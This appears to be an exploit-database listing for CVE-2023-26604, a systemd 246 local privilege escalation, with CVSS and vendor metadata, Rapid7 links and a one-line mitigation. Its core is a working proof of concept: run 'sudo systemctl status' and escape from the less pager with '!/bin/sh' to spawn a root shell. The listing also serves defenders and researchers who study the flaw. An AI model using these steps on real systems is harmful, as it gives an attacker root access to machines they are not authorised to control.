header-logo
Suggest Exploit
vendor:
systemd
by:
Iyaad Luqman K (init_6)
7.8
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: systemd
Affected Version From: systemd 246
Affected Version To: systemd 246
Patch Exists: NO
Related CWE: CVE-2023-26604
CPE: a:systemd:systemd:246
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-1326/https://www.rapid7.com/db/vulnerabilities/debian-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp10-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2023-26604/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2023-26604/
Other Scripts:
Platforms Tested: Ubuntu 22.04
2023

systemd 246 – Local Privilege Escalation

systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. This vulnerability allows a local attacker to gain root privileges.

Mitigation:

No patch available at the moment. Avoid running `systemctl status` as root user.
Source

Exploit-DB raw data:

# Exploit Title: systemd 246 - Local Privilege Escalation
# Exploit Author: Iyaad Luqman K (init_6)
# Application: systemd 246
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-26604

systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. 
This vulnerability allows a local attacker to gain root privileges.

## Proof Of Concept:
1. Run the systemctl command which can be run as root user.

sudo /usr/bin/systemctl status any_service

2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.

3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

Navigation

Suggest Exploit

Services By CQR